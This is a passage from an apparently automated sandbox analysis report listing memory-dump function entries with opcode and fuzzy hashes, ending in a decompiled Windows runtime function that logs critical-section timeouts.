                                                                              • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                              • Instruction ID: 7a0ca24b600977940af00fc175c5618a015eb61380b8fdb626638b867a370b0e
                                                                              • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                              • Instruction Fuzzy Hash: 8ED0E935352980CFD717CB1DC958B1577A4BB44B84FC50490E501CB762E72CD944CA00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017635A1, Relevance: .0, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                              • Instruction ID: 082a052ad952966c7a3b3a65089b55bbdc73a210712e643a1fac9554b9ea10a1
                                                                              • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                              • Instruction Fuzzy Hash: 3BD0C9315515869AEB52AB78C238B68FBBABB00218F7820A5994B07957C33A4A5AD601
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0173DB40, Relevance: .0, Instructions: 11COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                              • Instruction ID: d26a5fbf54819dd710e6396729bd6d3f27da1b0b91a1dc81a40811fb1ff4c549
                                                                              • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                              • Instruction Fuzzy Hash: 74C08C70280A01AAEB361F20CD01B00BAA1BB50B41F8400A06702DA0F0EBB9DC01E610
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017BA537, Relevance: .0, Instructions: 11COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                              • Instruction ID: 6e8f093a9377588ebcd1485530d0ed90f26ed94c558bd52377c24a31af662449
                                                                              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                              • Instruction Fuzzy Hash: 42C01232080248BBCB126E82CC00F06BB2AEBA8B60F008010BA080A5608672E970EA84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01753A1C, Relevance: .0, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                              • Instruction ID: 11fff886b8ce5e9ec1630b30e02cf62435839d2d406878590fa82b84f6ef8eb0
                                                                              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                              • Instruction Fuzzy Hash: B3C08C32080248BBC7126F41DC00F01BB29E7A0B60F000020BA050A5608572ECA0D598
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0173AD30, Relevance: .0, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                              • Instruction ID: 2c88e266978f74eb3720907d16dc77a4f54cf72c7994071162fe080b258eecc0
                                                                              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                              • Instruction Fuzzy Hash: D2C02B330C0248BBC7126F45DD00F01BF2DE7A0B60F000020FA040B671C972EC61D588
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017476E2, Relevance: .0, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                              • Instruction ID: 9b9fe03b4241b0e3a10589e07821b25daa8b55d40d756ce17016d29116165ff4
                                                                              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                              • Instruction Fuzzy Hash: FFC08C701411805BEB2E570CCE24B20BA51AB08708F88019CEA01094A2C3A8A803C208
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017636CC, Relevance: .0, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                              • Instruction ID: ef294bd48de92df688f5e82968049664fa77eeccd8dac2d068b2ee711c6be2cd
                                                                              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                              • Instruction Fuzzy Hash: 3CC02B70158440FBD7151F30CD00F14F258F700B21F6403547322454F0E57A9C00D100
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01757D50, Relevance: .0, Instructions: 7COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                              • Instruction ID: b3799b0459a3d0a9ffe81802f51ac5ce18e755cbc8a7d304621234e400cac126
                                                                              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                              • Instruction Fuzzy Hash: 61B09235301A408FCF6ADF18C080B1573E4BB44A40BC400D0E800CBA21D229E8408900
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01762ACB, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                              • Instruction ID: fe09063f7c68f9b26bc6c92c97366b4057fdd4a0ffda5cc81fe72a3704c930ab
                                                                              • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                              • Instruction Fuzzy Hash: 17B01232C10841CFCF02EF84C610F19B331FB00760F0544A0900127930C72CAC01CB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779950, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 15932f40f9082653ba95b398e68d2f01fffbdd24bc7dc4294643f77dc155e89e
                                                                              • Instruction ID: 9e6bdf4667f70b1d862fa3aae5434074b0e33fba3daa9eed8dfcbe48e76c985c
                                                                              • Opcode Fuzzy Hash: 15932f40f9082653ba95b398e68d2f01fffbdd24bc7dc4294643f77dc155e89e
                                                                              • Instruction Fuzzy Hash: 779002A124540407D1507599C804A075005A7D4342F51C021E2054559ECA698C517175
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017799D0, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e2aad4f829e18e96d16f5b80f75a912337ef250a00ba0b2e2ce0f447166a96f1
                                                                              • Instruction ID: ef6623ffba94e6183638cb73e5d36885a43264c4fe41cb466badfc7db06e3d4d
                                                                              • Opcode Fuzzy Hash: e2aad4f829e18e96d16f5b80f75a912337ef250a00ba0b2e2ce0f447166a96f1
                                                                              • Instruction Fuzzy Hash: BC9002A125500046D1147199C404B065045A7E5241F51C022E2144558CC5698C617165
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0177B040, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5e724ea937300fc3d9afdb5ff2130885280fc6a41b74a0fd456e8f259fcea2ae
                                                                              • Instruction ID: fefb08d49e14898e574a571806e5a84ecc31dcca6b8833c0827c13d5065f295d
                                                                              • Opcode Fuzzy Hash: 5e724ea937300fc3d9afdb5ff2130885280fc6a41b74a0fd456e8f259fcea2ae
                                                                              • Instruction Fuzzy Hash: BF9002A1645140474550B199C804806A015B7E5341391C131E0444564CC6A88855B2A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779820, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d28ca5b4d20c47a843edf232d1a4a2b1a9e85e4869f440f468a5c6afd049f114
                                                                              • Instruction ID: 28b51003070e7ee1d4eed70be31b3b93bbb945d482fafa3a7a3167c66b0b479f
                                                                              • Opcode Fuzzy Hash: d28ca5b4d20c47a843edf232d1a4a2b1a9e85e4869f440f468a5c6afd049f114
                                                                              • Instruction Fuzzy Hash: 6290027128500406D1517199C404A065009B7D4281F91C022E0414558EC6958A56BAA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017798A0, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2fef18e462187a8539695b6c9dc790c39f703ef074ccadb13652abde778d70bd
                                                                              • Instruction ID: b3185b2124ddbb1f27ea1d2ab38d9c040921864f430e836e7262c6203332e7ea
                                                                              • Opcode Fuzzy Hash: 2fef18e462187a8539695b6c9dc790c39f703ef074ccadb13652abde778d70bd
                                                                              • Instruction Fuzzy Hash: 3D90026134500406D1127199C414A065009E7D5385F91C022E1414559DC6658953B172
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779B00, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 245f1f95a9f89314cc5c30cab660a4f95c8de4e4b205de4db42b3892ea642b88
                                                                              • Instruction ID: ac9727525f61f1e0ddd46b97801161e1b831ee6a20077452039de4dde61bdc69
                                                                              • Opcode Fuzzy Hash: 245f1f95a9f89314cc5c30cab660a4f95c8de4e4b205de4db42b3892ea642b88
                                                                              • Instruction Fuzzy Hash: 2890026128500806D1507199C414B075006E7D4641F51C021E0014558DC656896576F1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0177A3B0, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2f8174ff085aa43529a54e79c7f6f7f8638ce6342c4c624baaf19cc561947cd5
                                                                              • Instruction ID: 54ec3ed256d6df5df8d37bc53c03a640bdf2cf645efd759e92b27bad8fcbbce8
                                                                              • Opcode Fuzzy Hash: 2f8174ff085aa43529a54e79c7f6f7f8638ce6342c4c624baaf19cc561947cd5
                                                                              • Instruction Fuzzy Hash: C990027124544006D1507199C444A0BA005B7E4341F51C421E0415558CC6558856B261
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779A10, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9e3ec94a91f246e3d0086c28f2db3970ddc1c52f389cb00c29ca499000b3b0bc
                                                                              • Instruction ID: 8ed8709d07a9ed7a078d7d3d1556c05683607df1ee6351610208c0b68c8ffdbb
                                                                              • Opcode Fuzzy Hash: 9e3ec94a91f246e3d0086c28f2db3970ddc1c52f389cb00c29ca499000b3b0bc
                                                                              • Instruction Fuzzy Hash: 6290027124540406D1107199C808B475005A7D4342F51C021E5154559EC6A5C8917571
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779A80, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3c5d1bcd779f2b8a83dd26fb4b671622e3202a03d80f71d59e4e3db1ecff1c84
                                                                              • Instruction ID: 0906ae23ba91a3233cb3e26d464e4886b9e2180222ee0b1d562fc76b3509c9b3
                                                                              • Opcode Fuzzy Hash: 3c5d1bcd779f2b8a83dd26fb4b671622e3202a03d80f71d59e4e3db1ecff1c84
                                                                              • Instruction Fuzzy Hash: F990026124544446D1507299C804F0F9105A7E5242F91C029E4146558CC95588557761
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779560, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 54c3c48cb2dd2f457521f119d16ae5302f990a8243326ebbace6e5fefcd4fc5d
                                                                              • Instruction ID: 9cb97e0911c8f7a863c9817c26fb67e25a8827e833a5e7c9571ce7e9a1002987
                                                                              • Opcode Fuzzy Hash: 54c3c48cb2dd2f457521f119d16ae5302f990a8243326ebbace6e5fefcd4fc5d
                                                                              • Instruction Fuzzy Hash: E0900265265000060155B599860490B5445B7DA391391C025F1406594CC66188657361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0177AD30, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 371df96173f320c94793ad9ed7d593c684fbe9efaca7f80939f4d56a893f2204
                                                                              • Instruction ID: 550585e3878699d10e86e0adcfdd1cb0a3a293378617cd8f0252714687fe8a84
                                                                              • Opcode Fuzzy Hash: 371df96173f320c94793ad9ed7d593c684fbe9efaca7f80939f4d56a893f2204
                                                                              • Instruction Fuzzy Hash: 8F900271A490001691507199C814A469006B7E4781B55C021E0504558CC9948A5573E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779520, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe551ee56048534049748bb8c7f7f65fee9dad9db73e6355af3d90fa6f6ffeeb
                                                                              • Instruction ID: 8c7b1b171b30ef49206f13fa1eba31cfe6530f12daa99065c91329b3c58d5d13
                                                                              • Opcode Fuzzy Hash: fe551ee56048534049748bb8c7f7f65fee9dad9db73e6355af3d90fa6f6ffeeb
                                                                              • Instruction Fuzzy Hash: 149002E1245140964510B299C404F0A9505A7E4241B51C026E1044564CC5658851B175
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017795F0, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1d1d5ab5cc7cc20feed391799308b78b432d8b10b1430dbded42ff775b0133df
                                                                              • Instruction ID: cf2dbe57dd51d8e2a4fb9ffc11203562084c10e7ff3dced7e32232b0a09b7866
                                                                              • Opcode Fuzzy Hash: 1d1d5ab5cc7cc20feed391799308b78b432d8b10b1430dbded42ff775b0133df
                                                                              • Instruction Fuzzy Hash: 7F90027124500806D1147199C804A865005A7D4341F51C021E6014659ED6A588917171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0177A770, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7b07ea4f71422a59b0d68333466d2f6a4b976fe4bd2426f55811d8fca1566ab4
                                                                              • Instruction ID: ff64f5f5ff32471214d6c709fb3d14d1b348e9b852e2d293ec82baa86b426193
                                                                              • Opcode Fuzzy Hash: 7b07ea4f71422a59b0d68333466d2f6a4b976fe4bd2426f55811d8fca1566ab4
                                                                              • Instruction Fuzzy Hash: 7F90027524904446D5107599D804E875005A7D4345F51D421E041459CDC6948861B161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779770, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9126b2c2201d0226219994bf6623e8153371eb9b2699bbfcdef9ab0c2a392e38
                                                                              • Instruction ID: 052342e678cf9187717ada033db46855a7430b849b8b9aa1c9218fff01be8a4c
                                                                              • Opcode Fuzzy Hash: 9126b2c2201d0226219994bf6623e8153371eb9b2699bbfcdef9ab0c2a392e38
                                                                              • Instruction Fuzzy Hash: FC90026124904446D1107599D408E065005A7D4245F51D021E1054599DC6758851B171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779760, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d57cd515f99dd680f5682487e59087a7d6773ddac8d4f2915b976daa2521b252
                                                                              • Instruction ID: dc50ff2618b8245d2463c8d8e2ae9c05240511086bfe35e703504527662113d7
                                                                              • Opcode Fuzzy Hash: d57cd515f99dd680f5682487e59087a7d6773ddac8d4f2915b976daa2521b252
                                                                              • Instruction Fuzzy Hash: 9890027124500407D1107199D508B075005A7D4241F51D421E041455CDD69688517161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779730, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ed780b5e215a2da9274a21ef2243f01ae0b3a62df6a733069ea816a0e6b7b3fa
                                                                              • Instruction ID: 5e65c9f227cd0ed0537ff8069e32ca84190fd94a81cca94fa4ec1e9371f9d701
                                                                              • Opcode Fuzzy Hash: ed780b5e215a2da9274a21ef2243f01ae0b3a62df6a733069ea816a0e6b7b3fa
                                                                              • Instruction Fuzzy Hash: BF90026164900406D1507199D418B065015A7D4241F51D021E0014558DC6998A5576E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0177A710, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1d92dec7e3b16569d44fd35f3d7f09123a4e8be3b25643d2eafd76448c4c40d8
                                                                              • Instruction ID: 95a683b27d81680177687f79d1073793fab41e8d7a19b45872e7718bc892d633
                                                                              • Opcode Fuzzy Hash: 1d92dec7e3b16569d44fd35f3d7f09123a4e8be3b25643d2eafd76448c4c40d8
                                                                              • Instruction Fuzzy Hash: 70900271345000569510B6D9D804E4A9105A7F4341B51D025E4004558CC59488617161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779FE0, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7bc7bc1d3e7b46c26274b9074f437a6d514b08a0958799e764655dffcc98e944
                                                                              • Instruction ID: b582540a66b8fdeac5070419f4576c3f3b0365fd6d4e97d9eb18b06db570bdc8
                                                                              • Opcode Fuzzy Hash: 7bc7bc1d3e7b46c26274b9074f437a6d514b08a0958799e764655dffcc98e944
                                                                              • Instruction Fuzzy Hash: 9B90027135514406D1207199C404B065005A7D5241F51C421E081455CDC6D588917162
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779650, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cefea8671b798f5c9e8f8d3b42fa2272705168de28ab9de170cc254a2cbbd016
                                                                              • Instruction ID: 023844e9b30c8c1408a4dc9698d50e3cdb2ea3c9afced73da6660d673aca3b83
                                                                              • Opcode Fuzzy Hash: cefea8671b798f5c9e8f8d3b42fa2272705168de28ab9de170cc254a2cbbd016
                                                                              • Instruction Fuzzy Hash: 2690027124904846D1507199C404E465015A7D4345F51C021E0054698DD6658D55B6A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779610, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db1f69420103fde52786b18adc7292a583c39f139e8ae6fa981d5fe3faf0a1ef
                                                                              • Instruction ID: dfa41f4e83a4a768442bfeacbe218a259e7522816fbe0aad57ef4137dd445adb
                                                                              • Opcode Fuzzy Hash: db1f69420103fde52786b18adc7292a583c39f139e8ae6fa981d5fe3faf0a1ef
                                                                              • Instruction Fuzzy Hash: 4090027164900806D1607199C414B465005A7D4341F51C021E0014658DC7958A5576E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017796D0, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 03d63450be5a4265054fd0f4f12ab9a3ab83ccfd36769bcffd4f1f85cfe4c394
                                                                              • Instruction ID: 0642f80cd08d381db3d83c543d7d6afeeb987cf0b7083e3a72c894fe9eb13c09
                                                                              • Opcode Fuzzy Hash: 03d63450be5a4265054fd0f4f12ab9a3ab83ccfd36769bcffd4f1f85cfe4c394
                                                                              • Instruction Fuzzy Hash: AA90027124500846D1107199C404F465005A7E4341F51C026E0114658DC655C8517561
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779670, Relevance: .0, Instructions: 2COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction ID: 4a7ab07b44d6136e6226d333d157ca90fb9c87a0c67772db8e3f1d1db80acb2d
                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction Fuzzy Hash:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E017CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0177CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E017C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E017C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                              0x017cfdda
                                                                              0x017cfde2
                                                                              0x017cfde5
                                                                              0x017cfdec
                                                                              0x017cfdfa
                                                                              0x017cfdff
                                                                              0x017cfe0a
                                                                              0x017cfe0f
                                                                              0x017cfe17
                                                                              0x017cfe1e
                                                                              0x017cfe19
                                                                              0x017cfe19
                                                                              0x017cfe19
                                                                              0x017cfe20
                                                                              0x017cfe21
                                                                              0x017cfe22
                                                                              0x017cfe25
                                                                              0x017cfe40

                                                                              APIs
